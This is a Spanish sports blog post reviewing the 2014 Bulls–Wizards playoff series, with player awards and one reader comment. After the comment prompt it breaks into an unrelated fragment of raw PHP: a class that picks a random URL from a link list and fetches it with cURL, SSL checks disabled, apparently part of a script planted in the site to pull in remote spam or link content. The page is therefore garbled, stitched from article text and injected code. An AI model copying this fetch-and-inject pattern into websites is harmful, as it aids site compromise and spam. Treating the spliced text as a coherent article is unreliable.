Playoffs 2014: Resumen Bulls 1 – Wizards 4

02 de May de 2014 por TheDeerHunter

Primera relativa sorpresa de postemporada y primer epic fail en toda nuestra frente. Cualquier parecido de nuestras previsiones con la realidad es pura coincidencia.

No seamos tan duros con nosotros mismos. Nuestro compañero Sancho, al contrario que muchos reputados analistas, sí les daba una significativa cuota de crédito a los Wizards. Señalaba varios detalles clave para entender lo que ha pasado, empezando por los antecedentes de la temporada, favorables a los Wizards, así como el estado de forma con el que han afrontado el tramo final, el escaso respeto que habían mostrado a la hora de enfrentarse a estos Bulls y, porqué no, la mención a la historia más reciente, donde los Arenas, Jamison y Hughes superaron la primera ronda por última vez frente a Chicago. También avisó de la que podían liar la “House of guards” como él llamaba a la dupla Wall-Beal, así como los problemas que podían tener los Bulls para controlar un perímetro tan rico. Clavado. Incluso llegó a profetizar que los Wizards robarían el 0-2 inicial.

Con lo que seguramente no contábamos ni unos ni otros es con el factor Nene. No vamos a descubrir sus cualidades ahora pero todos sabemos que su figura no está exenta de riesgos. Es célebre su tendencia a perderse partidos de repente, con las más variadas lesiones en las que rara vez acorta plazos. Más bien todo lo contrario. No obstante cuando está presente se hace notar. Este curso prácticamente nadie ha hecho sufrir tanto al mejor defensor del año como él ahora. Creo que nadie se llevará las manos a la cabeza si afirmamos que el dúo Gortat-Nene es la mejor pareja interior de la conferencia ahora mismo. Probablemente de largo.
En definitiva, a la chita callando, los Wizards tienen un señor equipo. Fácilmente superior en calidad a estos Bulls, a quienes se les ha notado el esfuerzo en el momento crítico y no por casualidad. Thibodeau lleva tiempo jugándose las habichuelas con 7 tíos, y con tendencia a utilizar a Boozer lo mínimo posible. Titular por aquello del qué dirán, como insinuaba Sancho, pero poco más.

Es una lástima terminar dando esta imagen después de una temporada tan meritoria. Ni rastro de las grandes virtudes de los respetados Bulls, de sus inmejorables sistemas defensivos, de Noah, de Augustin… Partidos a 70, sí, pero sólo por parte de Chicago.
Lo que se preveía como una de esas típicas eliminatorias del Este a cara de perro ha terminado siendo un abuso de unos sobre otros. Se trata de la selección natural de una competición tan dura como ésta. Así debe ser.

PREMIOS

MVP: Compartido. John Wall impecable, tanto en ataque como en defensa. Colofón a un gran año. Casi 19 puntos, 7 asistencias, más de 4 rebotes y medio y más de dos robos. Algo más irregular estuvo Bradley Beal en la regular, pero ahora ha sido un puñal. Casi 20 puntos por encima del 45% desde la larga distancia. A añadir los mismos rebotes que Wall, 4 asistencias y 1 robo.

Sorpresa: Como decimos el baile de Nene a Noah ha sido exagerado. Estamos deseando verle en la siguiente ronda, quizá contra Millsap.

La decepción: Para muchos Boozer ya no es ninguna decepción. Probablemente le hace falta un cambio de aires. Peor nos ha sorprendido DJ Augustin que ha estado terriblemente desacertado en esta serie. No hubo esta vez conejo de la chistera de Thibodeau.

El mayor esfuerzo en vano: El premio es la definición misma de Jimmy Butler. Casi 44 minutos por partido y lo peor es que está acostumbrado. Noah, quemadísimo, también ha disputado 42. Con todo el mejor hombre de los Bulls, en esta ocasión, ha sido Taj Gibson.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    Viendo la serie y el abuso q supuso, solo cabe preguntarse como los bulls gananron tantos partidos de la regular con tan poco

    La respuesta esta en modo de jugar estilo PO, incluso enm los partidos mas insulsos de la temporada regular, jugaron al maximo todo el año y no tuvieron una mejora q ofrecer por el hecho de ser postemporada

    En cambio si lo hicieron los wizards, defendiendo modo PO, mucho mas intenso q en la regular y cuidando y perfeccionando muchos de sus ataques, simplemente fueron un equipo mas concentrado y mas duro q en la regular, los bulls hivieron lo de siempre y nos alcanzo

    Nene jugo a modo all star, y con un interno asi, sumado a gortat y a amenza en la q se ha transformado ariza, wall y beal tienen muchas libertades para jugar, y a la vista estan los resultados

    Muchas fichas a los wizards q viendo a los hawks y como estan de malo los pacers pueden meterse en final de conferencia y alli nene y gortat pueden hacerle un desastre a bosh y battier si ese sera el juego interno del heat

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>